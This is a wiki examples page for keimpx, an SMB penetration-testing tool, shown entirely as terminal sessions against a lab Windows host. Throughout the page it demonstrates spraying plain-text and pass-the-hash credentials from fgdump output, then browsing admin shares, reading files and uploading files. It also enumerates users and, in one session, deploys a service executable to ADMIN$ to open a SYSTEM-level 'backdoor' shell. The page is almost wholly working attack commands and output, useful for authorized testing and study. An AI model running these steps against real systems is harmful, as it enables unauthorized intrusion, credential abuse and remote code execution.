Skip to content

Examples

Jump to bottom
inquisb edited this page Jun 26, 2012 · 1 revision

Examples

Test only for usefulness of a single pair username/plain-text onto a single system

$ python keimpx.py -t 172.16.77.130 -U Administrator -P validpassword -v 1 -b
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.2
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
    
[16:49:35] [INFO] Loading targets
[16:49:35] [INFO] Loading credentials
[16:49:35] [INFO] Loading domains
[16:49:35] [INFO] Loaded 1 unique targets
[16:49:35] [INFO] Loaded 1 unique credentials
[16:49:35] [INFO] No domains specified, using NULL domain
[16:49:35] [INFO] Attacking host 172.16.77.130:445
[16:49:35] [INFO] Valid credentials on 172.16.77.130:445: Administrator/testpass
[16:49:35] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 1 times

TARGET SORTED RESULTS:

172.16.77.130:445
  Administrator/testpass


USER SORTED RESULTS:

Administrator/testpass
  172.16.77.130:445

Test for usefulness of dumped hashes onto a single system and interact with it afterwards

$ cat /tmp/hashes_and_plain
# Lines output of fgdump
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
# Cracked plain-text password
testuser testpass

$ python keimpx.py -t 172.16.77.130 -c /tmp/hashes_and_plain -v 1
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.2
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
    
[15:53:23] [INFO] Loading targets
[15:53:23] [INFO] Loading credentials
[15:53:23] [INFO] Loading domains
[15:53:23] [INFO] Loaded 1 unique targets
[15:53:23] [INFO] Loaded 4 unique credentials
[15:53:23] [INFO] No domains specified, using NULL domain
[15:53:23] [INFO] Attacking host 172.16.77.130:445
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[15:53:23] [INFO] Wrong credentials on 172.16.77.130:445: Guest/BLANK (2239)
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: testuser/testpass
[15:53:23] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 3 times

TARGET SORTED RESULTS:

172.16.77.130:445
  Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
  ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
  testuser/testpass


USER SORTED RESULTS:

Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
  172.16.77.130:445

ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
  172.16.77.130:445

testuser/testpass
  172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 1
Which credentials do you want to use to connect?
[1] Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[2] ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[3] testuser/testpass
> 3
[15:53:46] [INFO] type 'help' for help menu
# shares
[1] print$ (type: 0, comment: Printer Drivers)
[2] C$ (type: 0, comment: Default share)
[3] CanonMP9 (type: 1, comment: Canon MP980 series Printer)
[4] share (type: 0, comment: )
[5] C (type: 0, comment: )
[6] CanonMP9.2 (type: 1, comment: Canon MP980 series Printer (Copy 1))
[7] IPC$ (type: 3, comment: Remote IPC)
[8] ADMIN$ (type: 0, comment: Remote Admin)
Which share do you want to connect to? (default 1) 2
# dir
Wed Sep 19 10:11:41 2007	     	   	AUTOEXEC.BAT
Sat Sep 12 15:38:04 2009	     	208	boot.ini
[...]
# exit

Test for usefulness of dumped hashes onto a single system and spawn a command prompt

$ cat /tmp/hashes_and_plain
# Lines output of fgdump
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
# Cracked plain-text password
testuser testpass

$ python keimpx.py -t 172.16.77.130 -c /tmp/hashes_and_plain -v 1
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.2
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
    
[15:53:23] [INFO] Loading targets
[15:53:23] [INFO] Loading credentials
[15:53:23] [INFO] Loading domains
[15:53:23] [INFO] Loaded 1 unique targets
[15:53:23] [INFO] Loaded 4 unique credentials
[15:53:23] [INFO] No domains specified, using NULL domain
[15:53:23] [INFO] Attacking host 172.16.77.130:445
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[15:53:23] [INFO] Wrong credentials on 172.16.77.130:445: Guest/BLANK (2239)
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: testuser/testpass
[15:53:23] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 3 times

TARGET SORTED RESULTS:

172.16.77.130:445
  Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
  ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
  testuser/testpass


USER SORTED RESULTS:

Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
  172.16.77.130:445

ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
  172.16.77.130:445

testuser/testpass
  172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 1
Which credentials do you want to use to connect?
[1] Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[2] ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[3] testuser/testpass
> 1
[15:53:46] [INFO] type 'help' for help menu
# shell
[16:53:07] [INFO] Uploading the service executable to 'ADMIN$\ihtell.exe'
[16:53:07] [INFO] Connecting to the SVCCTL named pipe
[16:53:07] [INFO] Creating the service 'uYRYKB'
[16:53:07] [INFO] Starting the service 'uYRYKB'
[16:53:07] [INFO] Connecting to backdoor on port 2090, wait..
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 3:

   Connection-specific DNS Suffix  . : localdomain
   IP Address. . . . . . . . . . . . : 172.16.77.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.77.2

C:\WINDOWS\system32>exit
exit
[16:53:20] [INFO] Connecting to the SVCCTL named pipe
[16:53:20] [INFO] Stopping the service 'uYRYKB'
[16:53:20] [INFO] Deleting the service 'uYRYKB'
[16:53:20] [INFO] Removing the service executable 'ADMIN$\ihtell.exe'
# exit

Use the valid pair of credentials to interact with it afterwards

$ python keimpx.py -t 172.16.77.130 -U Administrator -P validpassword
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.2
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
    

The credentials worked in total 1 times

TARGET SORTED RESULTS:

172.16.77.130:445
  Administrator/validpassword


USER SORTED RESULTS:

Administrator/validpassword
  172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 
Which credentials do you want to use to connect?
[1] Administrator/validpassword
> 
# help
Generic options
===============
help - show this message
verbosity {level} - set verbosity level (0-2)
info - list system information
exit - terminates the SMB session and exit from the tool

Shares options
==============
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
pwd - shows current remote directory
ls {path} - lists all the files in the current directory
cat {file} - display content of the selected file
download {filename} - downloads the filename from the current path
upload {filename} - uploads the filename into the current path
mkdir {dirname} - creates the directory under the current path
rm {file} - removes the selected file
rmdir {dirname} - removes the directory under the current path

Services options
================
deploy {service name} {local file} [service args] - deploy remotely a service executable
undeploy {service name} {remote file} - undeploy remotely a service executable

Shell options
=============
shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp

Users options
=============
users [domain] - list users, optionally for a specific domain
pswpolicy [domain] - list password policy, optionally for a specific domain
domains - list domains to which the system is part of

Registry options (Soon)
================
regread {registry key} - read a registry key
regwrite {registry key} {registry value} - add a value to a registry key
regdelete {registry key} - delete a registry key

# shares
[1] print$ (type: 0, comment: Printer Drivers)
[2] C$ (type: 0, comment: Default share)
[3] CanonMP9 (type: 1, comment: Canon MP980 series Printer)
[4] share (type: 0, comment: )
[5] C (type: 0, comment: )
[6] CanonMP9.2 (type: 1, comment: Canon MP980 series Printer (Copy 1))
[7] IPC$ (type: 3, comment: Remote IPC)
[8] ADMIN$ (type: 0, comment: Remote Admin)
Which share do you want to connect to? (default 1) 2
# dir
Wed Sep 19 10:11:41 2007	     	   	AUTOEXEC.BAT
Sat Sep 12 15:38:04 2009	     	208	boot.ini
[...]
# cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /fastdetect /NoExecute=OptOut
# cd Windows\Temp
# dir
Fri Nov  6 18:30:15 2009	<DIR>	   	.
Fri Nov  6 18:30:15 2009	<DIR>	   	..
Wed May  6 12:51:52 2009	<DIR>	   	Cookies
Wed May  6 12:51:52 2009	<DIR>	   	History
Wed May  6 12:51:52 2009	<DIR>	   	Temporary Internet Files
# !ls    <- Prepending an exclamation mark, executes the command on your local system
contrib
keimpx.py
setup.py

# upload keimpx.py
# dir
Thu Nov 12 15:36:02 2009	<DIR>	   	.
Thu Nov 12 15:36:02 2009	<DIR>	   	..
Wed May  6 12:51:52 2009	<DIR>	   	Cookies
Wed May  6 12:51:52 2009	<DIR>	   	History
Thu Nov 12 15:36:02 2009	     	45838	keimpx.py
Wed May  6 12:51:52 2009	<DIR>	   	Temporary Internet Files
# users
Administrator
  User ID: 500
  Group ID: 513
  Enabled: True
  Logon count: 187
  Last Logon: Thu, 12 Nov 2009 15:37:13
  Kickoff: Mon, 14 Sep 2009 10:15:47
  Password can change: Mon, 14 Sep 2009 10:15:47
  Password must change: Infinity
  Bad password count: 0
  Logon hours: Unlimited
  Account Name: Administrator
  Description: Built-in account for administering the computer/domain
ASPNET
  User ID: 1003
  Group ID: 513
[...]
# domains
Domains:
  W2K3DEV
  Builtin
# exit

If you have any question, please refer to this wiki page before opening a new ticket or getting in touch with the author.

Clone this wiki locally